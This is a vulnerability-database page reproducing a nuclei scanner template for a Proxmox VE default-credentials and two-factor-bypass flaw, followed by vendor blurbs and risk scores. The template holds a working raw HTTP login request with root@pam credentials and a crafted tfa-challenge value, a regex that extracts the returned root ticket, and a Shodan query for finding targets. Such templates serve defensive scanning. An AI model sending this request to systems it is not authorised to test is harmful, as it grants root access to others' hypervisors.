Lucene search
+L

Proxmox VE - Default Credentials with TFA Bypass

🗓️ 06 Sep 2026 23:24:28Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Default credentials with TFA challenge bypass in Proxmox VE enabling root access.

Related
Code
id: CVE-2023-54391

info:
  name: Proxmox VE - Default Credentials with TFA Bypass
  author: DhiyaneshDk,0x_Akoko
  severity: critical
  description: |
    Detected Proxmox VE was accessible using default root@pam credentials combined with a TFA challenge bypass. An attacker could authenticate as root by submitting the default password "root@pam" along with a crafted tfa-challenge parameter, thereby bypassing two-factor authentication enforcement and gaining full administrative access to the hypervisor management interface.
  impact: |
    Unauthenticated attackers can bypass authentication and gain unauthorized access, including root privileges.
  remediation: |
    Update to version 8.0.4 or later.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Proxmox"
  tags: cve,cve2023,proxmox,auth-bypass,vuln,vkev

http:
  - raw:
      - |
        POST /api2/json/access/ticket HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
        Accept: application/json

        username=root%40pam&password=root%40pam&tfa-challenge=NEBUSEC-CHALLENGE

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"data"'
          - '"ticket"'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: ticket
        part: body
        regex:
          - '"ticket"\s*:\s*"([^"]+)"'
        group: 1
# digest: 4b0a00483046022100eede67d51e4d585bc9704d3f1db211f3a9f652fad913bf3c61f4fe387f3321c6022100a3d7d1aaffd38814578a8eb0b559e84bcd6bbfefb28a079bc555984b56b3830a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Sep 2026 11:41Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.3
CVSS 3.19.8
EPSS0.03031
SSVC
15